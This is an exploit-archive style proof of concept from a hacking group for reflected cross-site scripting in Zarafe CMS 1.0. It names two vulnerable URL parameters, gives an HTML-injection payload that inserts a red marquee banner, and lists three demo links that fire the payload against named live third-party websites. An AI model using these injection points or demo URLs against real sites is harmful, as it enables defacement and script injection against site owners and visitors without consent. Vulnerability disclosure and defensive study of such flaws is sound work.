######################
# Exploit Title : Zarafe CMS 1.0 / Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.zarrafeh.net/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/08/27
######################
#
# PoC:

GET => /product_view.php?product_id=[XSS]
GET => /articles.php?article_id=[XSS]

#Payload : 7b084"><marquee><font color=red size=4>Only For Security Alert c_C </font></marquee>

#Demo :

http://hadiesazan.ir/product_view.php?product_id=7b084%22%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E

http://www.pezeshkian-pharmacy.ir/products_view.php?product_id=7b084%22%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E

http://www.majidlab.com/articles.php?article_id=7b084%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4%3EOnly%20For%20Security%20Alert%20c_C%20%3C/font%3E%3C/marquee%3E

######################
# Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi &  Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : persian-team.ir
######################